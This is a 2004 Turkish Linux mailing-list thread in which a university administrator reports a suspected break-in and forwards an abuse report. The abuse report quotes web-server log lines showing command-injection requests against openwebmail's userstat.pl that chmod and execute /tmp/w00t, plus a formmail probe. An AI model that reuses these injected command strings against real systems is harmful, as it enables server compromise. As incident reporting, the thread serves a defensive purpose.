From: İBRAHİM DEMİREL (idemirel@biko.biz)
Date: Mon 21 Jun 2004 - 14:00:11 EEST
C:\Documents and Settings\Administrator>tracert 194.27.44.15
Tracing route to student.mku.edu.tr [194.27.44.15]
over a maximum of 30 hops:
. ............ ................. .................
. ............ ................. .................
. ............ ................. .................
. ............ ................. .................
5 109 ms 105 ms 105 ms 195.175.18.158
6 123 ms 122 ms 118 ms 193.140.0.110
7 122 ms 118 ms 118 ms student.mku.edu.tr [194.27.44.15]
Trace complete.
mustafa kemal unversitesinden baglanan birisi olsa gerek. yada oradan hesabi
[legal | illegal] olan birisi. Belki isinize yarar.....
----- Original Message -----
From: "Latife ZEYTXNELX" <lyolac@mku.edu.tr>
To: <linux-network@liste.linux.org.tr>
Sent: Monday, June 21, 2004 1:33 PM
Subject: [linux-network] who komutu
> merhaba
> who edigim zaman sadece kendimi goruyorum root oldugum halede diger
> kullanıcalrı goremiyorum bu neyden kaynaklanabilir.
> birilerinin sisteme girdiginden supheleniyorum
> last dedigimde sadece kendimi goruyorum
> oysa baska yerlerden baglananlar var onları goremiyorum
> ve surekli syslogd den mesaj geliyor
> birileri farklı isimde oturum acmıs
> lutfen acil olarak bu konuda yardımcı olurmusunuz
> kolay gelsin
> birde su mesaj geldi
> Dear Sir/Madame,
> This Saturday (190604) somebody tried to gain root privileges on a
> server in our serverpark. According to the log facility it was somebody
> out of your ip space.
> First he tried to gain shell acces by missusing some openwebmail bug and
> then he tried to exploit the kernel with a local kernel exploit. We have
> also found a script, it looks like there is some sort of deamon
> listening on 194.27.44.15 who is waiting for connections from the
> script, maybe some sort of autorooter/worm.
> I hope you could have a look at this matter asap.
>
> Kind Regards,
>
> GrafiX Internet B.V.
> Marcel Haman
>
> access_log.1:194.27.44.15 - - [19/Jun/2004:14:12:40 +0200] "GET
> /cgi-bin/openwebmail/userstat.pl?loginname=|chmod%20755%20/tmp/w00t
> HTTP/1.0" 200 151
> access_log.1:194.27.44.15 - - [19/Jun/2004:14:17:41 +0200] "GET
> /cgi-bin/openwebmail/userstat.pl?loginname=|exec%20/tmp/w00t HTTP/1.0"
> 200 -
> access_log.1:194.27.44.15 - - [19/Jun/2004:14:17:53 +0200] "GET
> /cgi-bin/openwebmail/userstat.pl?loginname=|chmod%20755%20/tmp/w00t
> HTTP/1.0" 200 151
> access_log.1:194.27.44.15 - - [19/Jun/2004:14:17:55 +0200] "GET
> /cgi-bin/openwebmail/userstat.pl?loginname=|exec%20/tmp/w00t HTTP/1.0"
> 200 151
> access_log.1:67.166.132.228 - - [19/Jun/2004:20:48:08 +0200] "GET
> /cgi-bin/formmail.pl?email=f2%40aol%2Ecom&subject=www%2Emaffiafeest%2
> Ecom%
> 2Fcgi%2Dbin%2Fformmail%2Epl&recipient=cgiscanner%40mail%2Enu&msg=w00t
>
> HTTP/1.1Content-Type: application/x-www-form-urlencoded" 400 299
> ------- End of Forwarded Message -------
>
>
>
>
>
>